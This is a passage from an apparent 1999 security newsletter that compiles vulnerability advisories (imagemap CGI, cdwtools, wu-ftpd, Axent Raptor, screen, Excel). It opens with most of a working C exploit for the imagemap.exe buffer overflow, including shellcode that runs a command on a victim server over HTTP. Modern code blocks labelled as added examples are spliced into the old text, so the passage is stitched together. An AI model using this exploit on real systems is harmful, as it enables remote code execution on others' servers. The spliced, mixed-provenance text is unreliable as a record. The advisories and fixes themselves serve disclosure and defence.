      0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
      0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
      0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
      0xFF,0x00
      };
      
      unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";
      
      unsigned int search_mem(unsigned char *st,unsigned char *ed,
                      unsigned char c1,unsigned char c2)
      {
          unsigned char   *p;
          unsigned int    adr;
      
          for (p=st;p<ed;p++)
              if (*p==c1 && *(p+1)==c2){
                  adr=(unsigned int)p;
                  if ((adr&0xff)==0) continue;
                  if (((adr>>8)&0xff)==0) continue;
                  if (((adr>>16)&0xff)==0) continue;
                  if (((adr>>24)&0xff)==0) continue;
                  return(adr);
              }
          return(0);
      }
      
      main(int argc,char *argv[])
      {
          SOCKET               sock;
          SOCKADDR_IN          addr;
          WSADATA              wsa;
          WORD                 wVersionRequested;
          unsigned int         i,ip,p1,p2;
          static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000];
          struct hostent       *hs;
      
          if (argc<2){
              printf("usage: %s VictimHost\n",argv[0]); return -1;
          }
          wVersionRequested = MAKEWORD( 2, 0 );
          if (WSAStartup(wVersionRequested , &wsa)!=0){
              printf("Winsock Initialization failed.\n"); return -1;
          }
          if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
              printf("Can not create socket.\n"); return -1;
          }
          addr.sin_family     = AF_INET;
          addr.sin_port       = htons((u_short)HTTP_PORT);
          if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
                  if ((hs=gethostbyname(argv[1]))==NULL){
                      printf("Can not resolve specified host.\n"); return -1;
                  }
                  addr.sin_family = hs->h_addrtype;
                  memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
          }
          if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
              printf("Can not connect to specified host.\n"); return -1;
          }
          memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
          for (i=0;;i+=2){
              if (mems[i]==0) return FALSE;
              if ((ip=search_mem((unsigned char *)mems[i],
                  (unsigned char *)mems[i+1],0xff,0xe3))!=0) break;
          }
          buf[RETADR  ]=ip&0xff;
          buf[RETADR+1]=(ip>>8)&0xff;
          buf[RETADR+2]=(ip>>16)&0xff;
          buf[RETADR+3]=(ip>>24)&0xff;
          buf[JMPADR  ]=0xeb;
          buf[JMPADR+1]=0x06;
      
          strcat(exploit_code,cmdbuf);
          p1=(unsigned int)LoadLibrary;
          p2=(unsigned int)GetProcAddress;
          exploit_code[0x0d]=p1&0xff;
          exploit_code[0x0e]=(p1>>8)&0xff;
          exploit_code[0x0f]=(p1>>16)&0xff;
          exploit_code[0x10]=(p1>>24)&0xff;
          exploit_code[0x1e]=p2&0xff;
          exploit_code[0x1f]=(p2>>8)&0xff;
          exploit_code[0x20]=(p2>>16)&0xff;
          exploit_code[0x21]=(p2>>24)&0xff;
      
          memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
          sprintf(packetbuf,"GET /cgi-bin/imagemap.exe?%s\r\n\r\n",buf);
          send(sock,packetbuf,strlen(packetbuf),0);
          closesocket(sock);
          printf("Done.\n");
          return FALSE;
      }
      
       Since source code for the imagemap program is supplied, UNYUN of
       Shadow Penguin Security suggests that checking for oversized
       arguments be added to the code:
      
      
       void main(int argc, char **argv)
       {
       ----------- omit ----------
       char OutString[100];
       ----------- omit ----------
       if(argc >= 2) {
       //
       // extract x & y from passed values
       //
       strcpy(OutString, argv[1]);
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Buffer overflow caused by this strcpy().
       This overflow can be avoided if you put the following code before
       strcpy().
      
       if (strlen(argv[1]) > 99) exit(1);
      
       There are no known vendor provided solutions to this problem.
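
       The length check suggested above, carried through as an added example
       (not UNYUN's or Omnicron's code): the argument is rejected before it is
       copied into the 100-byte buffer, and the coordinates are then parsed
       strictly. The "x,y" query format and the names copy_arg_checked,
       parse_coord, parse_click and parse_oversized are assumptions made for
       illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <limits.h>

#define OUTSTRING_SIZE 100   /* size of OutString in the excerpt above */

/* Copy arg into dst only if it fits, terminator included.
 * Returns 0 on success, -1 if arg is NULL or too long (dst is left empty). */
int copy_arg_checked(char *dst, size_t dstsz, const char *arg)
{
    size_t len;

    if (dst == NULL || dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (arg == NULL)
        return -1;
    len = strlen(arg);
    if (len >= dstsz)            /* same test as strlen(argv[1]) > 99 */
        return -1;
    memcpy(dst, arg, len + 1);
    return 0;
}

/* Parse one non-negative decimal coordinate; *end is set just past the digits. */
static int parse_coord(const char *s, const char **end, int *out)
{
    char *stop;
    long v;

    if (*s < '0' || *s > '9')    /* no sign, no leading whitespace */
        return -1;
    errno = 0;
    v = strtol(s, &stop, 10);
    if (errno != 0 || v > INT_MAX)
        return -1;
    *out = (int)v;
    *end = stop;
    return 0;
}

/* Assumed query format "x,y" (the excerpt only says x and y are extracted).
 * Returns 0 and fills *x and *y, or -1 on malformed or oversized input. */
int parse_click(const char *arg, int *x, int *y)
{
    char OutString[OUTSTRING_SIZE];
    const char *p;

    if (copy_arg_checked(OutString, sizeof OutString, arg) != 0)
        return -1;
    if (parse_coord(OutString, &p, x) != 0 || *p != ',')
        return -1;
    if (parse_coord(p + 1, &p, y) != 0 || *p != '\0')
        return -1;
    return 0;
}

/* Build a constructed argument of n filler bytes and try to parse it. */
int parse_oversized(size_t n)
{
    char *big = malloc(n + 1);
    int x = 0, y = 0, rc;

    if (big == NULL)
        return -2;
    memset(big, 'A', n);
    big[n] = '\0';
    rc = parse_click(big, &x, &y);
    free(big);
    return rc;
}

int main(int argc, char **argv)
{
    int x, y;

    if (argc < 2 || parse_click(argv[1], &x, &y) != 0) {
        /* Answer with an error instead of processing the request. */
        printf("Content-type: text/plain\r\n\r\nBad request\n");
        return 1;
    }
    printf("Content-type: text/plain\r\n\r\nx=%d y=%d\n", x, y);
    return 0;
}
```

       Rejecting on length before the copy keeps the fixed-size buffer, as the
       suggested one-line check does; the strict parse additionally refuses
       anything that is not two decimal numbers.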
       
       credit
      Posted to BugTraq by UNYUN
      <shadowpenguin@backsection.net> on Oct 22,
      1999.

      reference
      web page:
               Omnicron Homepage
               (Omnicron Technologies Corporation)
               http://www.omnicron.ab.ca
               
      message:
               Imagemap CGI overflow exploit
               (UNYUN <shadowpenguin@backsection.net>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=380FFD9429E.0DA9SHADOWPENGUIN@fox.nightland.net
               
      



      @HWA
      

63.0  Linux cdwtools Vulnerabilities
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id 738
      class      Unknown
      cve        GENERIC-MAP-NOMATCH
      remote     No
      local      Yes
      published  October 22, 1999
      updated    October 22, 1999
      
      vulnerable
      
              S.u.S.E. Linux 6.2
              S.u.S.E. Linux 6.1
              
       cdwtools is a package of utilities for cd-writing. The linux version of
      these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to
      several local root compromises. It is known that there are a number of
      ways to exploit these packages, including buffer overflows and /tmp
      symlink attacks.        
      
      S.u.S.E offers patched packages at the location below:

      ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/cdwtools-0.93-101.i386.rpm
      ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/cdwtools-0.93-100.i386.rpm
      ftp://ftp.suse.com/pub/suse/axp/update/6.1/ap1/cdwtools-0.93-101.alpha.rpm

      credit
       This bug was apparently discovered by Brock Tellier and
       published in a S.u.S.E advisory on Oct 20, 1999.

      reference
       advisory:
               SuSE-025: All Linux distributions using cdwtools
               (SuSE)
               http://www.securityfocus.com/templates/advisory.html?id=1803
      web page:
               S.u.S.E. Patches/Fixes
               (S.u.S.E.)
               http://www.suse.de/de/support/download/updates/index.html
               
      @HWA         
      
64.0  WU-Ftpd NEW DoS vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  737
      class       Failure to Handle Exceptional Conditions
      cve         GENERIC-MAP-NOMATCH
      remote      Yes
      local       No
      published   October 21, 1999
      updated     October 21, 1999
      
      vulnerable
      
              Washington University wu-ftpd 2.5
                 + RedHat Linux 6.1
                 
      not vulnerable
              Washington University wu-ftpd 2.6.0
      
       It may be possible for remote users to cause wu-ftpd to consume large
      amounts of memory, creating a denial of service. If users can upload
      files, arbitrary code can be executed with the uid of the ftpd (usually
      root).
      
      You can upgrade to the newest version of Wu-ftpd (2.6) for any
      vulnerable platform.
     
      RedHat has released patches available at the following locations:
     
      Red Hat Linux 4.2
      -----------------
     
      Intel:
      ftp://updates.redhat.com//4.2/i386/wu-ftpd-2.6.0-0.4.2.i386.rpm
      Alpha:
      ftp://updates.redhat.com//4.2/alpha/wu-ftpd-2.6.0-0.4.2.alpha.rpm
      Sparc:
      ftp://updates.redhat.com//4.2/sparc/wu-ftpd-2.6.0-0.4.2.sparc.rpm
      Source packages:
      ftp://updates.redhat.com//4.2/SRPMS/wu-ftpd-2.6.0-0.4.2.src.rpm
     
      Red Hat Linux 5.2
      -----------------
     
      Intel:
      ftp://updates.redhat.com//5.2/i386/wu-ftpd-2.6.0-0.5.x.i386.rpm
      Alpha:
      ftp://updates.redhat.com//5.2/alpha/wu-ftpd-2.6.0-0.5.x.alpha.rpm
      Sparc:
      ftp://updates.redhat.com//5.2/sparc/wu-ftpd-2.6.0-0.5.x.sparc.rpm
      Source packages:
      ftp://updates.redhat.com//5.2/SRPMS/wu-ftpd-2.6.0-0.5.x.src.rpm
     
      Red Hat Linux 6.x
      -----------------
     
      Intel:
      ftp://updates.redhat.com//6.0/i386/wu-ftpd-2.6.0-1.i386.rpm
      Alpha:
      ftp://updates.redhat.com//6.0/alpha/wu-ftpd-2.6.0-1.alpha.rpm
      Sparc:
      ftp://updates.redhat.com//6.0/sparc/wu-ftpd-2.6.0-1.sparc.rpm
      Source packages:
      ftp://updates.redhat.com//6.0/SRPMS/wu-ftpd-2.6.0-1.src.rpm
      
      credit
      Released in CERT advisory CA-99-13, posted to BugTraq
      on Oct 19, 1999 and originally AUSCERT advisory
      AA-99.02, published on Oct 19, 1999.

      reference
       advisory:
               CA-99-13: Multiple Vulnerabilities in WU-FTPD
               (CERT)
               http://www.securityfocus.com/templates/advisory.html?id=1797
               
      advisory:
               AA-99.02: Multiple Vulnerabilities in wu-ftpd
               based daemons
               (AusCERT)
               http://www.securityfocus.com/templates/advisory.html?id=1799
               
      advisory:
               RHSA-1999:043-01: Security problems in
               WU-FTPD
               (RedHat)
               http://www.securityfocus.com/templates/advisory.html?id=1801
               
      web page:
               Updates, Fixes, and Errata Page
               (RedHat)
               http://www.redhat.com/corp/support/errata/index.html
               


      CA-99-13: Multiple Vulnerabilities in WU-FTPD
      Published: Tue Oct 19 1999
      Updated: Tue Oct 19 1999 
      
      
      
      CERT Advisory CA-99-13 Multiple Vulnerabilities in WU-FTPD
      
         Original release date: October 19, 1999
         Last revised: --
         Source: CERT/CC
         
         A complete revision history is at the end of this file.
         
      Systems Affected
      
           * Systems running the WU-FTPD daemon or its derivatives
             
      I. Description
      
         Three vulnerabilities have been identified in WU-FTPD and other ftp
         daemons based on the WU-FTPD source code. WU-FTPD is a common package
         used to provide File Transfer Protocol (FTP) services. Incidents
         involving at least the first of these vulnerabilities have been
         reported to the CERT Coordination Center.
         
      Vulnerability #1: MAPPING_CHDIR Buffer Overflow
      
         Because of improper bounds checking, it is possible for an intruder to
         overwrite static memory in certain configurations of the WU-FTPD
         daemon. The overflow occurs in the MAPPING_CHDIR portion of the source
         code and is caused by creating directories with carefully chosen
         names. As a result, FTP daemons compiled without the MAPPING_CHDIR
         option are not vulnerable.
         
         This is the same vulnerability described in AUSCERT Advisory
         AA-1999.01, which is available from
         
         ftp://www.auscert.org.au/security/advisory/AA-1999.01.wu-ftpd.mapping_chdir.vul
                
         This is not the same vulnerability as the one described in CA-99-03
         "FTP Buffer Overflows", even though it is closely related. Systems
         that have patches to correct the issue described in CA-99-03 may still
         be vulnerable to this problem.
         
      Vulnerability #2: Message File Buffer Overflow
      
         Because of improper bounds checking during the expansion of macro
         variables in the message file, intruders may be able to overwrite the
         stack of the FTP daemon.
         
         This is one of the vulnerabilities described in AUSCERT Advisory
         AA-1999.02, which is available from
         
         ftp://www.auscert.org.au/security/advisory/AA-1999.02.multi.wu-ftpd.vuls
                
      Vulnerability #3: SITE NEWER Consumes Memory
      
         The SITE NEWER command is a feature specific to WUFTPD designed to
         allow mirroring software to identify all files newer than a supplied
         date. This command fails to free memory under some circumstances.
         
      II. Impact
      
      Vulnerability #1: MAPPING_CHDIR Buffer Overflow
      
         Remote and local intruders may be able to exploit this vulnerability to
         execute arbitrary code as the user running the ftpd daemon, usually
         root.
         
         To exploit this vulnerability, the intruder must be able to create
         directories on the vulnerable systems that are accessible via FTP.
         While remote intruders are likely to have this privilege only through
         anonymous FTP access, local users may be able to create the required
         directories in their own home directories.
         
      Vulnerability #2: Message File Buffer Overflow
      
         Remote and local intruders may be able to exploit this vulnerability to
         execute arbitrary code as the user running the ftpd daemon, usually
         root.
         
         If intruders are able to control the contents of a message file, they
         can successfully exploit this vulnerability. This access is frequently
         available to local users in their home directories, but it may be
         restricted in anonymous FTP access, depending on your configuration.
         
         Additionally, under some circumstances, remote intruders may be able
         to take advantage of message files containing macros provided by the
         FTP administrator.
         
      Vulnerability #3: SITE NEWER Consumes Memory
      
         Remote and local intruders who can connect to the FTP server can cause
         the server to consume excessive amounts of memory, preventing normal
         system operation. If intruders can create files on the system, they
         may be able to exploit this vulnerability to execute arbitrary code as
         the user running the ftpd daemon, usually root.
         
      III. Solution
      
      Install appropriate patches from your vendor
      
         These vulnerabilities can be eliminated by applying appropriate
         patches from your vendor. We encourage you to apply a patch as soon as
         possible and to disable vulnerable programs until you can do so.
         
         Disabling the WU-FTPD daemon may prevent your system from operating
         normally. Upgrading to WU-FTPD 2.6.0 may cause some inter-operability
         problems with certain FTP clients. We encourage you to review the
         WU-FTPD documentation carefully before performing this upgrade.
         
         Appendix A contains information provided by vendors for this advisory.
         We will update the appendix as we receive more information. If you do
         not see your vendor's name, the CERT/CC did not hear from that vendor.
         Please contact your vendor directly.
         
         Until you can install a patch, you can apply the following
         workarounds.
         
      Vulnerability #1: MAPPING_CHDIR Buffer Overflow
      
         This vulnerability can be corrected by compiling the WU-FTPD daemon
         without the MAPPING_CHDIR option. Exploitation by anonymous remote
         intruders can be mitigated by limiting write access, but this solution
         is not encouraged.
         
      Vulnerability #2: Message File Buffer Overflow
      
         Remote exploitation of this vulnerability can be mitigated and
         possibly eliminated by removing macros from message files until a
         patch can be applied.
         
      Vulnerability #3: SITE NEWER Consumes Memory
      
         There are currently no workarounds available.
         
      Appendix A. Vendor Information
      
      Data General
      
         DG/UX is not vulnerable to this problem.
         
      FreeBSD
      
         FreeBSD has updated its wuftpd and proftpd ports to correct this
         problem as of August 30, 1999. Users of these ports are encouraged to
         upgrade their installation to these newer versions of these ports as
         soon as possible.
         
      IBM Corporation
      
         AIX is not vulnerable. It does not ship wu-ftpd.
         
         IBM and AIX are registered trademarks of International Business
         Machines Corporation.
         
      OpenBSD
      
         OpenBSD does not use (and never will use) wuftpd or any of its
         derivatives.
         
      Santa Cruz Operation, Inc.
      
         Security patches for SCO UnixWare 7.x, SCO UnixWare 2.x, and
         OpenServer 5.x will be made available at http://www.sco.com/security.
         
      SGI
      
         SGI IRIX and Unicos do not ship with wu-ftpd, so they are not
         vulnerable. As a courtesy, unsupported pre-compiled IRIX inst images
         for wu-ftpd are available from http://freeware.sgi.com/ which may be
         vulnerable. When the freeware products are next updated, they should
         contain the latest wu-ftpd code which should include the security
         fixes.
         
         SGI Linux 1.0 which is based on RedHat 6.0 ships with wu-ftpd rpms.
         When new wu-ftpd rpms are available for RedHat 6.0, they can be
         installed on SGI Linux 1.0.
         
         SGI NT Workstations do not ship with wu-ftpd.
         
      Sun
      
         Sun is not vulnerable.
         
      WU-FTPD and BeroFTPD
      
         Vulnerability #1:
         
         Not vulnerable:
                versions 2.4.2 and all betas and earlier versions
         Vulnerable:
                wu-ftpd-2.4.2-beta-18-vr4 through wu-ftpd-2.4.2-beta-18-vr15
                wu-ftpd-2.4.2-vr16 and wu-ftpd-2.4.2-vr17
                wu-ftpd-2.5.0
                BeroFTPD, all versions
                
         Vulnerability #2:
         
         Not vulnerable:
                wu-ftpd-2.6.0
         Vulnerable:
                All versions of wuarchive-ftpd and wu-ftpd prior to version
                2.6.0, from wustl.edu, academ.com, vr.net and wu-ftpd.org.
                BeroFTPD, all versions
                
         Vulnerability #3:
          
         Not vulnerable:
                wu-ftpd-2.6.0
         Vulnerable:
                All versions of wuarchive-ftpd and wu-ftpd prior to version
                2.6.0, from wustl.edu, academ.com, vr.net and wu-ftpd.org.
                BeroFTPD, all versions
                
         With version 2.6.0, the major functionality of BeroFTPD has been
         merged back into the WU-FTPD daemon. Development of BeroFTPD has
         ceased; there will be no upgrades or patches. Users are advised to
         upgrade to WU-FTPD version 2.6.0.
         
         WU-FTPD Version 2.6.0 is available for download from mirrors around
         the world. A full list of mirrors is available from:
         
         ftp://ftp.wu-ftpd.org/pub/README-MIRRORS
                
         The current version of WU-FTPD (presently 2.6.0) is also available
         from the primary distribution site:
         
         ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-current.tar.gz
         ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-current.tar.Z
           _________________________________________________________________
         
         The CERT Coordination Center would like to thank Gregory Lundberg (a
         member of the WU-FTPD development group) and AUSCERT for their assistance
         in preparing this advisory.
         ______________________________________________________________________
         
         This document is available from:
         http://www.cert.org/advisories/CA-99-13-wuftpd.html
      
               
       @HWA
       
65.0  Axent Raptor Denial of Service Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.securityfocus.com/ 
      
      bugtraq id 736
      class      Failure to Handle Exceptional Conditions
      cve        GENERIC-MAP-NOMATCH
      remote     Yes
      local      No
      published  October 21, 1999
      updated    October 21, 1999
      
      vulnerable
      
              Axent Raptor 6.0         
              
      It is possible to remotely lock Axent Raptor firewalls by sending them
      packets with malformed IP options fields. According to an advisory
      posted to bugtraq by the Purdue CERIAS labs, setting the SECURITY
      and TIMESTAMP IP options length to 0 can cause an infinite loop to
      occur within the code that handles the options (resulting in the software
      freezing). A consequence of this is a remote denial of service.
      
      Axent has released a hotfix for this problem which is available at:

      ftp://ftp.raptor.com/patches/V6.0/6.02Patch/
      
      credit
      This was discovered by the CERIAS labs at Purdue
      (cs.purdue.edu) and posted to BugTraq on October 21,
      1999.

      reference
       message:
               Remote DoS in Axent's Raptor 6.0
               (Mike Frantzen <frantzen@expert.cc.purdue.edu>)
               
       To: BugTraq
       Subject: Remote DoS in Axent's Raptor 6.0
       Date: Wed Oct 20 1999 04:45:56
       Author: Mike Frantzen
       Message-ID: <199910202245.RAA28104@expert.cc.purdue.edu>
      
      
       This bug was discovered in the CERIAS labs at Purdue by:
              Florian Kerschbaum  <fkerschbaum@cs.purdue.edu>
              Mike Frantzen       <frantzen@expert.cc.purdue.edu>
                      
       Thanks to the Purdue CERIAS Firewall group:
              Stephanie Miller    <millersa@cs.purdue.edu>
              Florian Kerschbaum  <fkerschbaum@cs.purdue.edu>
              Mike Frantzen       <frantzen@expert.cc.purdue.edu>
              Eric Hlutke         <eric@hlutke.com>
              Hendry Lim          <lim1@cs.purdue.edu>
              Manu Pathak         <pathakm@cs.purdue.edu>
      
      
       Environment:  Sparc 5 85MHz
                     Solaris 2.6 Generic_105181-12
                     Axent Raptor 6.0.0 Firewall
      
      
       Thesis:  Axent's Raptor programmers have a switch statement for
                IP Options in a packet.  They likely have cases for most
                of the options contained in the RFC's but only wrote
                handling code for the commonly 'malused' options (source
                routing).  For all the other known options, they are handled
                by a generic routine which likely tries to skip that option.
                See probable code snapshot below.
      
      
       Background:  IP Options are (generally) of the form:
                 -------- -------- -------- --------
                |  Type  | Length |  ...   |  ...   |
                 -------- -------- -------- --------
                Where the Type indicates which IP Option is present and the
                Length obviously indicates how long the option is.  It also
                needs to be pointed out that there can be multiple options
                inside an IP packet -- they just follow each other.
      
      
       Problem: IP Packets are parsed either with interrupts masked off or
                while holding a vital global mutex.  When the option
                parsing tries to skip a 'benign' option, it forgets to check
                if it is of zero length.  So the end result is essentially:
                  for (ecx = 20; ecx < header_length; ecx += 0 ) { ... }
                The Options that can lock up the firewall are the Timestamp option
                and the Security option.  The copy bit does not appear to affect
                the results.  Nor does the underlying protocol (TCP, UDP or
                random).
      
      
       Solution one:  Learn to power cycle your firewall ;-)
       Solution two:  Block all traffic with IP Options at your screening router.
       Solution three:  Apply Axent's Hotfix
                        ftp://ftp.raptor.com/patches/V6.0/6.02Patch/
      
      
       Sidenote one:  Axent received the bug and responded _swiftly_.  I was
                      extremely impressed.
       Sidenote two:  Out of respect to the way Axent handled the bug (and the fact
                      they are a CERIAS Sponsor), we are not releasing an exploit.
      
      
       This is the probable offending segment of code in Raptor.  It is only
       an educated guess--I have not seen their code nor have I disassembled it.
      
       [.....]
      
              /* Parse the IP Options of the packet */
              for (c = 20; c < (ip.ip_hl * 4); ) {
                      switch ( packet[c] & ~COPY_BIT ) {
                       case TIMESTAMP:
                       case SECURITY:
                              if ( c + 1 > ip.ip_hl * 4 )
                                      goto done_parsing_label;
                              option_length = packet[c + 1];
      
                               /* ******************************   ****
                                * Forgetting to check if the option length is
                                * zero here.  So you enter an infinite loop
                                * ******************************   ****/
      
                              if ( option_length + c > ip.ip_hl * 4 )
                                      goto done_parsing_label;
                              c += option_length;
                              break;
                       case END_OF_OPTIONS:
                              goto done_parsing_label;
                       case NOP:
                              c++;
                              break;
                       case STRICT_SOURCE_ROUTE:
                       case LOOSE_SOURCE_ROUTE:
                       case RECORD_ROUTE:
                              log_dangerous_packet();
                       default:
                              if ( c + 1 >= ip.ip_hl * 4 )
                                      goto done_parsing_label;
                              option_length = packet[c + 1];
                              if ( (option_length == 0)
                                 ||(option_length + c >= ip.ip_hl * 4) )
                                      goto done_parsing_label;
                              c += option_length;
                              break;
                      }
              }
              done_parsing_label:
      
              queue_packet_down_stack(packet);
              unmask_interrupts();

       [.....]
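
       The zero-length check the post says is missing, as an added example
       (not Raptor's code and not part of the original post): a bounded walk
       that rejects any length octet below 2, beside the post's guessed loop
       shape run under an iteration budget so the stall can be observed. The
       function names, result codes and sample headers are constructed here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define OPT_NUMBER_MASK 0x7f  /* strips the copy bit, as the post's loop does */
#define OPT_END         0x00  /* End of Option List: one octet, no length */
#define OPT_NOP         0x01  /* No Operation: one octet, no length */

/* Negative results are rejections; zero or more is the option count. */
enum {
    OPTS_ERR_HEADER  = -1,  /* buffer shorter than the header it claims */
    OPTS_ERR_LENGTH  = -2,  /* length octet below 2, which includes zero */
    OPTS_ERR_OVERRUN = -3   /* option extends past the end of the header */
};

/* Constructed 24-byte IPv4 headers (IHL = 6, checksums left at zero).
 * 0x44 is the Timestamp option type, 0x82 the Security option type. */
#define HDR20 0x46, 0, 0, 24, 0, 0, 0, 0, 64, 17, 0, 0, \
              192, 0, 2, 1, 192, 0, 2, 2
static const uint8_t PKT_TS_OK[]      = { HDR20, 0x44, 4, 5, 0 };
static const uint8_t PKT_TS_ZERO[]    = { HDR20, 0x44, 0, 0, 0 };
static const uint8_t PKT_SEC_ZERO[]   = { HDR20, 0x82, 0, 0, 0 };
static const uint8_t PKT_TS_OVERRUN[] = { HDR20, 0x44, 8, 5, 0 };

/* Header length in bytes, or 0 if the buffer cannot hold it. */
static size_t header_len(const uint8_t *pkt, size_t pkt_len)
{
    size_t ihl;

    if (pkt_len < 20)
        return 0;
    ihl = (size_t)(pkt[0] & 0x0f) * 4;
    return (ihl >= 20 && ihl <= pkt_len) ? ihl : 0;
}

/* Hardened walk: every step must advance the cursor by at least one. */
int walk_ip_options(const uint8_t *pkt, size_t pkt_len)
{
    size_t ihl = header_len(pkt, pkt_len), c = 20;
    int count = 0;

    if (ihl == 0)
        return OPTS_ERR_HEADER;
    while (c < ihl) {
        uint8_t type = pkt[c] & OPT_NUMBER_MASK;
        uint8_t len;

        if (type == OPT_END)
            break;
        if (type == OPT_NOP) {
            c++;
            count++;
            continue;
        }
        if (c + 1 >= ihl)           /* no room for the length octet */
            return OPTS_ERR_OVERRUN;
        len = pkt[c + 1];
        if (len < 2)                /* length counts type + length octets */
            return OPTS_ERR_LENGTH;
        if (len > ihl - c)
            return OPTS_ERR_OVERRUN;
        c += len;
        count++;
    }
    return count;
}

/* Loop shape guessed at in the post, with an iteration budget added so the
 * stall can be observed. Returns 1 if the budget ran out, 0 if it ended. */
int unchecked_walk_stalls(const uint8_t *pkt, size_t pkt_len, unsigned budget)
{
    size_t ihl = header_len(pkt, pkt_len), c = 20;

    while (ihl != 0 && c < ihl) {
        uint8_t type = pkt[c] & OPT_NUMBER_MASK;

        if (budget-- == 0)
            return 1;
        if (type == OPT_END || c + 1 >= ihl)
            break;
        if (type == OPT_NOP)
            c++;
        else
            c += pkt[c + 1];        /* zero length: c never moves */
    }
    return 0;
}

int main(void)
{
    printf("timestamp, length 4: %d\n", walk_ip_options(PKT_TS_OK, sizeof PKT_TS_OK));
    printf("timestamp, length 0: %d\n", walk_ip_options(PKT_TS_ZERO, sizeof PKT_TS_ZERO));
    printf("security,  length 0: %d\n", walk_ip_options(PKT_SEC_ZERO, sizeof PKT_SEC_ZERO));
    printf("timestamp, length 8: %d\n", walk_ip_options(PKT_TS_OVERRUN, sizeof PKT_TS_OVERRUN));
    printf("unchecked loop stalls on length 0: %d\n",
           unchecked_walk_stalls(PKT_TS_ZERO, sizeof PKT_TS_ZERO, 1000));
    return 0;
}
```

       A rejected header should be dropped and logged before any lock is
       taken or interrupts are masked, so a malformed option costs one
       bounded pass at most.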
       
       
       @HWA


66.0  RedHat screen pty(7) Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  732
      object      screen (exec)
      class       Origin Validation Error
      cve         GENERIC-MAP-NOMATCH
      remote      No
      local       Yes
      published   October 21, 1999
      updated     October 21, 1999
      
      vulnerable
      
              RedHat Linux 6.1
              
      not vulnerable
              RedHat Linux 6.0.0
              RedHat Linux 5.2.0
              RedHat Linux 5.1.0
              RedHat Linux 5.0.0
              RedHat Linux 4.2.0
              RedHat Linux 4.1.0
              RedHat Linux 4.0.0
              RedHat Linux 3.0.3
              RedHat Linux 2.1.0
              RedHat Linux 2.0.0
              
       The version of screen which ships with Redhat Linux 6.1 sets incorrect
       permissions on the pty (pseudo-terminal driver). The pty driver provides
       support for a pair of devices collectively known as a pseudo-terminal.
       The two devices comprising a pseudo-terminal are known as a
       controller and a slave. 

       Instead of having a hardware interface and associated hardware that
       supports the terminal functions, the functions are implemented by
       another process manipulating the controller device of the
       pseudo-terminal.

       These ptys are represented as a regular file on the UNIX filesystem. As
       a result of poor permission settings, these ptys are world-writable, thus
       allowing other users to hijack another user's pty and execute commands
       as the user whose pty has been stolen. This can result in root privileges
       if 'root' is running the vulnerable version of screen.
       
       Redhat has made the following RPMS available which address this
       problem:

       Red Hat Linux 6.1:

       Intel: 

       ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/screen-3.9.4-3.i386.rpm

       Source package: 

       ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/screen-3.9.4-3.src.rpm
       
       credit
      This bug was discovered by Chris Evans and posted as a
      Redhat advisory (RHSA-1999:042-01) to the Bugtraq
      mailing list by Bill Nottingham <notting@REDHAT.COM> on
      Wed, 20 Oct 1999.

      reference
        advisory:
               RHSA-1999:042-01: screen defaults to not
               using Unix98 ptys
               (RedHat)
               http://www.securityfocus.com/templates/advisory.html?id=1800
               
        web page:
               Updates, Fixes, and Errata Page
               (RedHat)
               http://www.redhat.com/corp/support/errata/index.html
               
               
        
       @HWA
       
67.0  Microsoft Excel File Import Macro Execution Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  728
      class       Design Error
      cve         GENERIC-MAP-NOMATCH
      remote      Unknown
      local       Yes
      published   October 20, 1999
      updated     October 20, 1999
 
 
      vulnerable
      
              Microsoft Excel 97 SR2
              Microsoft Excel 97 SR1
              Microsoft Excel 97
                 - Microsoft Windows 98
                 - Microsoft Windows 95
                 - Microsoft Windows NT 4.0
              Microsoft Office 97
                 - Microsoft Windows 98
                 - Microsoft Windows 95
                 - Microsoft Windows NT 4.0       
                 
      When a Lotus 1-2-3 or Quattro Pro file containing a macro is opened by
      Excel 97, the user is not warned that a macro will be executed upon
      opening the file (as is customary when Excel opens other spreadsheet
      files containing macros.)
      
      Microsoft has released a patch for this vulnerability. It is available at:

      - Excel 97:
      http://officeupdate.microsoft.com/downloadDetails/Xl8p7pkg.htm
      - Excel 2000:
      http://officeupdate.microsoft.com/2000/downloadDetails/XL9p1pkg.htm
      
      credit
      The vulnerability was reported to Microsoft by David Young
      of Derby, UK.

      reference
       advisory:
               MS99-044: Patch Available for "Excel SYLK"
               Vulnerability
               (MS)
               http://www.securityfocus.com/templates/advisory.html?id=1798
               
       web page:
               Microsoft Security Bulletin MS99-044:
               Frequently Asked Questions
               (Microsoft)
               http://www.microsoft.com/security/bulletins/MS99-044faq.asp
               
       web page:
               Q241900: XL97: Opening Lotus 1-2-3 File May
               Execute Macro Without Warning
               (Microsoft)
